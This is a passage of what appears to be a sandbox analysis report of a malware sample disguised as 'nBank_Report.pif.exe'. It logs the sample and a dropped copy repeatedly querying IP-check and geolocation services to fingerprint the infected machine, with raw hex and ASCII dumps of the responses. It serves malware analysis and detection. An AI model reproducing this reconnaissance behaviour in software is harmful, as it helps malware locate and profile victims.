                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 11:33:28.808727980 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b0f21cc14fb0b7d37bb4117563eceadc
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.1049714132.226.247.73805500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:28.811773062 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:29.475547075 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cc38379ebf674910739f31deeefbb588
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 11:33:29.478965044 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 11:33:29.683826923 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 54ad5dd95695510ca95be9f8b6b995c4
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 11:33:30.360580921 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 11:33:30.564913034 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b0388847598dfa0332a1abadf5172504
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.1049716132.226.247.73803276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:29.405134916 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:30.089086056 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8f624ddc822cec4cee03724b8ce7dd56
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.1049720132.226.247.73803276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:30.742078066 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:31.427967072 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 1d7a3b18c6196d825dfdc31a1f8b1f4e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.1049721132.226.247.73805500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:31.209203005 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 11:33:31.888994932 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c9aee5d06c55f4701d74b671b3a19ded
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.1049724132.226.247.73803276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:32.063292980 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:32.728061914 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 74441a47b1f10123b845ec327861d48d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.1049725132.226.247.73805500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:32.501794100 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:33.184525013 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: e8d0a0db8ed86f5c1c636ab26527af68
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.1049729132.226.247.73805500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:33.792538881 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:34.467854023 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d07e333bb7fca64089c813cbf7132f62
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.1049734132.226.247.73805500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:35.080065012 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:35.749371052 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cf5f542b831195b27a983acaad743bf0
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.1049736132.226.247.73805500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:36.488157988 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:37.184925079 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: adb92363fd3c625cbb6e4f1e9c4e6e37
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.1049738132.226.247.73805500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:37.800132036 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:38.472773075 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 3d29a800cb852232da0b3520e025c2af
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1049706188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:23 UTC671INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:23 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8035
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PdJo0IeQC4Hq2ybIN8fK1tX175fZSItfxZloxGTtSSiNH8dLxpz%2BbPj8VnzjJ0CLPQPIWvGE7VYvIDPE7s1xmjYUY39NUajTL0vHw07IWuCVvjyjK42LeCs95QkHJA1CfJeQ1PGC"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240900d4f0cd9-EWR
                                              2024-09-26 09:33:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.1049708188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:24 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 09:33:24 UTC671INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:24 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8036
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBVpO175IobJFwKviRTRjbv4nEa19nl51nhn3RUwDLGtKCgXiPk866j8hEbpKYZaW4KD4yo1kggqxe3q2VDgd9DRzlf5Y4E%2BLvYkYH6mnbr0bz40DTgL2AhGhSO5Ovb67dVzUDna"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240953b3880dc-EWR
                                              2024-09-26 09:33:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.1049710188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 09:33:26 UTC711INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:25 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8037
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PuumDo93x2Bn3hi%2ByZTZY1lkCsgT5M%2FN%2Fu5yFNu%2B9Bd0hNXzyrvzzmUc%2B1TazxgWfVBue7tx%2BLFShf8zqy074GsErOzwCKjBq8Yq3RfzbnJ5CljSG89O8cTUirkIbyRoI7G6mzQe"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c92409d5fc14387-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-09-26 09:33:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.1049712188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:27 UTC683INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:27 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8039
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Izo2E1xPcPwq0XHrYbUHvqikxKxVDmEbjQ%2FibFsGyoOWkhH1e8gN2FXO2wAD5%2Bm%2B7RLdzcmFE8TAFh%2F%2FRCPdgkhpv58HHcp%2BVVq26ns6Zo31SLrgSrmBGjE5J%2Bs11GsICbsLOtdz"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240a569b243c2-EWR
                                              2024-09-26 09:33:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
